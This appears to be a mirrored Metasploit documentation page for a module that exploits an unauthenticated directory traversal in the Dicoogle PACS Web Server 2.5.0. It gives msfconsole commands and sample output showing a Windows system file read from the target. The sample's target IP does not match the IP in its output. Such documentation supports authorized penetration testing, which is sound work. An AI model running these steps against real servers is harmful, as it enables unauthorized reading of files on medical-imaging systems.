CoCalc -- dicoogle_traversal.md

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md
Views: ¹¹⁷⁸⁸

Description

This module exploits an unauthenticated directory traversal vulnerability in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an attacker to read arbitrary files with the web server privileges. While the application is java based, the directory traversal was only successfully tested against Windows targets.

Verification Steps

Start msfconsole
use auxiliary/scanner/http/dicoogle_traversal
set RHOSTS [IP]
run

Scenarios

Tested on Windows 2012 with Dicoogle 2.5.0 on Java 8 update 151

msf5 > use auxiliary/scanner/http/dicoogle_traversal 
msf5 auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 auxiliary(scanner/http/dicoogle_traversal) > set verbose true
verbose => true
msf5 auxiliary(scanner/http/dicoogle_traversal) > run

[+] 192.168.2.164:8080 - ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

[+] File saved in: /root/.msf4/loot/20180803091123_default_192.168.2.164_dicoogle.travers_347491.txt

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Description

Verification Steps

Scenarios

Tested on Windows 2012 with Dicoogle 2.5.0 on Java 8 update 151

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Description

Verification Steps

Scenarios

Tested on Windows 2012 with Dicoogle 2.5.0 on Java 8 update 151

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.